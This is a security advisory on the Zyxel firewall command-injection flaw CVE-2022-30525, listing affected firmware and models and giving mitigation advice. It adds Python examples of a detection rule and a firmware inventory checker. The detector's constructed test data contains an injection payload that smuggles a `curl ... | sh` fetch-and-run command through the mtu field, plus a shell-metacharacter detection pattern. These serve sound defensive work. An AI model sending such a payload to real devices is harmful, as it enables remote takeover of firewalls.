Network administrators are being urged to patch Zyxel firewalls to address a critical vulnerability, CVE-2022-30525. The flaw is under active exploitation and allows remote code execution (RCE) via a crafted HTTP request to the device's web interface.
An unauthenticated remote attacker can run operating-system commands on any affected firewall whose web interface is exposed to the internet.
A researcher, BlueNinja, has published detection logic for exploitation attempts on GitHub. Because internet-exposed management interfaces are scanned constantly, this detection will produce a lot of noise if enabled for external-facing devices; expect to tune it and to read its alerts alongside each device's patch status.
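The detection logic itself is not reproduced on this page. As an added example, not BlueNinja's code and not anything from Zyxel, the Python below contrasts a noisy rule (flag every request that touches the firewall's ZTP CGI handler) with a tighter one that only fires when a POST to that handler carries a setWanPortSt command whose fields contain shell metacharacters or a non-numeric MTU. The request shape follows the public disclosure of CVE-2022-30525; the handler path, the request records, the addresses and the record format are assumptions constructed for this example. It also assumes the traffic is visible to something in front of the firewall (a reverse proxy, IDS or packet capture), since the firewall's own logs may not record request bodies.

```python
import json
import re

# Assumed endpoint of the vulnerable ZTP CGI handler (from the public disclosure).
HANDLER_PATH = "/ztp/cgi-bin/handler"

# Shell metacharacters that have no business in the fields of a WAN-port command.
SHELL_META = re.compile(r"[;|&`$(){}<>\n]")

# Constructed sample requests, as a reverse proxy or IDS in front of the
# firewall's web interface might record them. Not real traffic.
SAMPLE_REQUESTS = [
    {"src": "203.0.113.10", "method": "POST", "path": "/ztp/cgi-bin/handler",
     "body": '{"command":"setWanPortSt","proto":"dhcp","port":"4","vlan_tag":"1",'
             '"vlanid":"5","mtu":"; curl http://203.0.113.10/x.sh | sh;","data":"hi"}'},
    {"src": "198.51.100.7", "method": "POST", "path": "/ztp/cgi-bin/handler",
     "body": '{"command":"setWanPortSt","proto":"dhcp","port":"4","vlan_tag":"1",'
             '"vlanid":"5","mtu":"1500","data":"hi"}'},
    {"src": "198.51.100.8", "method": "GET", "path": "/ztp/cgi-bin/handler", "body": ""},
    {"src": "192.0.2.5", "method": "POST", "path": "/cgi-bin/zysh-cgi", "body": "cmd=show+version"},
    {"src": "203.0.113.11", "method": "POST", "path": "/ztp/cgi-bin/handler",
     "body": "not json at all"},
]


def broad_rule(req):
    """Noisy rule: any request to the ZTP handler, whatever it carries."""
    return req["path"] == HANDLER_PATH


def tight_rule(req):
    """Flag only requests shaped like a command-injection attempt."""
    if req["method"] != "POST" or req["path"] != HANDLER_PATH:
        return False
    try:
        body = json.loads(req["body"])
    except (json.JSONDecodeError, TypeError):
        return False  # malformed probes are noise, not exploitation
    if not isinstance(body, dict) or body.get("command") != "setWanPortSt":
        return False
    # A legitimate MTU is a plain integer; anything else is a strong signal.
    if not str(body.get("mtu", "")).isdigit():
        return True
    # Any other field carrying shell metacharacters is suspicious too.
    return any(isinstance(v, str) and SHELL_META.search(v)
               for k, v in body.items() if k != "command")


def scan(requests, rule):
    """Return the source addresses of every request the rule flags."""
    return [r["src"] for r in requests if rule(r)]


if __name__ == "__main__":
    print("broad:", scan(SAMPLE_REQUESTS, broad_rule))
    print("tight:", scan(SAMPLE_REQUESTS, tight_rule))
```

Run against the constructed sample, the broad rule flags four of the five requests, including a benign-looking DHCP configuration and a malformed probe, while the tight rule flags only the request that smuggles a shell pipeline through the mtu field. The tight rule will miss an attacker who finds a field or encoding this list does not cover, so on an internet-facing device it is best paired with a periodic firmware check rather than relied on alone.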
Affected Products
Firmware ZLD V5.00 through ZLD V5.21 Patch 1 on the following devices:
- USG FLEX 100, 100W, 200, 500, 700
- USG20-VPN, USG20W-VPN
- ATP 100, 200, 500, 700, 800
The VPN series is not affected.
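A practitioner with more than a handful of firewalls will want to triage an inventory rather than eyeball each device. The Python below is an added example, not a Zyxel tool: it parses firmware strings, assumed here to take the form V5.21(ABUF.1) with the model code and patch level in parentheses, and reports which devices fall inside the affected range above. The fixed release, ZLD V5.30, is taken from Zyxel's advisory rather than this page; the inventory and its model codes are constructed.

```python
import re

# Assumed Zyxel version-string format, e.g. "V5.21(ABUF.1)":
# ZLD major.minor, then (model code . patch level). Verify against the
# output of your own device before trusting this parser.
VERSION_RE = re.compile(r"^V(\d+)\.(\d+)\(([A-Z]+)\.(\d+)\)$")

# Models listed as affected for CVE-2022-30525.
AFFECTED_MODELS = {
    "USG FLEX 100", "USG FLEX 100W", "USG FLEX 200", "USG FLEX 500", "USG FLEX 700",
    "USG20-VPN", "USG20W-VPN",
    "ATP 100", "ATP 200", "ATP 500", "ATP 700", "ATP 800",
}
FIRST_AFFECTED = (5, 0, 0)    # ZLD 5.00
LAST_AFFECTED = (5, 21, 1)    # ZLD 5.21 Patch 1
FIXED = (5, 30, 0)            # ZLD 5.30, per Zyxel's advisory (not stated on this page)


def parse_version(s):
    """Turn 'V5.21(ABUF.1)' into the comparable tuple (5, 21, 1)."""
    m = VERSION_RE.match(s.strip())
    if not m:
        raise ValueError(f"unrecognised Zyxel version string: {s!r}")
    major, minor, _model_code, patch = m.groups()
    return (int(major), int(minor), int(patch))


def is_vulnerable(model, version):
    """True when the model is in scope and the firmware is in the affected range."""
    if model not in AFFECTED_MODELS:
        return False
    return FIRST_AFFECTED <= parse_version(version) <= LAST_AFFECTED


# Constructed inventory; model codes are placeholders.
INVENTORY = [
    ("USG FLEX 100", "V5.21(ABUF.1)"),   # last affected patch level
    ("ATP 500", "V5.30(ABFW.0)"),        # already on the fixed release
    ("VPN100", "V5.21(ABFV.1)"),         # VPN series, out of scope
    ("USG20-VPN", "V5.10(ABAQ.0)"),      # inside the affected range
]


def needs_patch(inventory):
    """Return the (model, version) pairs that must be updated."""
    return [(m, v) for m, v in inventory if is_vulnerable(m, v)]


if __name__ == "__main__":
    for model, version in needs_patch(INVENTORY):
        print(f"PATCH: {model} {version}")
```

The check is deliberately conservative about format: an unrecognised version string raises rather than silently passing, so a device with an odd firmware label shows up as an error to investigate instead of disappearing from the patch list.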
Containment, Mitigations & Remediations
Administrators are urged to apply Zyxel's firmware fix immediately. Until a device is patched, its web management interface should not be reachable from the internet, since exposure of that interface is what makes the flaw exploitable remotely.
Indicators of Compromise
The vulnerability is under active exploitation and a Metasploit module has been released, making exploitation trivial. Zyxel firewalls are popular with small- and medium-sized enterprises because of their feature set and price point, and more than 15,000 devices are potentially vulnerable.
MITRE ATT&CK technique: T1190 – Exploit Public-Facing Application